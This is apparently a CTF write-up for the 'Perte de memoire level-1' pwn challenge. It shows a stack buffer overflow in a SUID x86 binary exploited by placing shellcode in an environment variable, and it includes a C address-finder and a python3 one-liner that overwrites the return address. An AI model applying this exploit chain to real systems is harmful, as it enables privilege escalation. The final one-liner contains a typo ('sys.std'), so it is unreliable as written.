Home CTFs | CTF-interINSA | Perte de memoire level-1
Post
Cancel

CTFs | CTF-interINSA | Perte de memoire level-1

Posted Apr 7, 2024
By Cong Khai NGUYEN
2 min read

Perte de memoire level-1

The challenge provides us an IP address, username and password to access via SSH. After logging in to SSH, we can immediately see a file that can be exploited through SUID.

ls_la

To simplify the exploiting process, I utilize SCP to transfer the binary file onto my Kali Linux machine, initiating the reverse engineering procedure.

scp

Reverse enginnering

Through the utilization of the commands ‘file’ and ‘checksec’, we ascertain that the binary is compiled under the x86 architecture and lacks NX protection.

bin_info

This indicates the possibility of injecting shellcode directly into the stack to obtain a shell. However, I opt for a more intriguing technique that, in my view, involves fewer steps for successful exploitation. This technique involves saving the shellcode into an environment variable and then manipulating EIP to point to the address of this environment variable.

Static analysis

We will search for vulnerabilities present in this binary file. Initially, I will utilize Ghidra to analyze the functions within the file.

main
main_func

func
vuln_func

As observed within the ‘func’ function, it is utilizing strcpy to copy the contents of argv[1] into the local variable local_34, which opens up the possibility of a buffer overflow vulnerability.

Dynamic analysis

For dynamic analysis, I utilize GDB on the remote computer via SSH to identify the exact number of characters necessary to overflow the buffer and control the return address.

First I put a break point at the instruction leave in the func function so I can observe the entire stack

gdb_break_point

Use the command python3 -c 'import sys;sys.stdout.buffer.write(b"A"*44+b"B"*4+b"C"*4+b"D"*4)' and observe the stack

find_junk

return_overwrite

Our analysis concludes that it requires a total of 52 characters (44+4 for buffer overflow + 4 for the saved base pointer) to reach and manipulate the return address.

Exploit

Now I will start the exploit process. First I will write the shellcode to SHELLCODE environment variable

shellcode_env

Next, I will employ a C program (provided below) to find the precise address of the SHELLCODE within the binary file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char * argv[]) {
    char *ptr;
    if(argc<3){
        printf("Usage: %s <environment var> <target program name>\n", argv[0]);
        exit(0);
    }
    ptr = getenv(argv[1]);
    ptr += (strlen(argv[0]) - strlen(argv[2])) * 2;  
    printf("%s will be at %p\n", argv[1], ptr);
}

// gcc -m32 -o findenv findenv.c

findenv

shellcode_addr

Address of SHELLCODE 0xffffd821

Finally, we have all the information. Use the command below to get the shell and get the flag

./first $(python3 -c 'import sys;sys.std.buffer.write(b"A"*52+<SHELLCODE's address>)')

–> ./first $(python3 -c 'import sys;sys.std.buffer.write(b"A"*52+b"\x21\xd8\xff\xff")')

flag

Flag: FLAG[BOFISGOOD!]

CTFs, CTF-interINSA, Perte de memoire level-1
CTF CTF-interINSA pwn
This post is licensed under CC BY 4.0 by the author.
Contents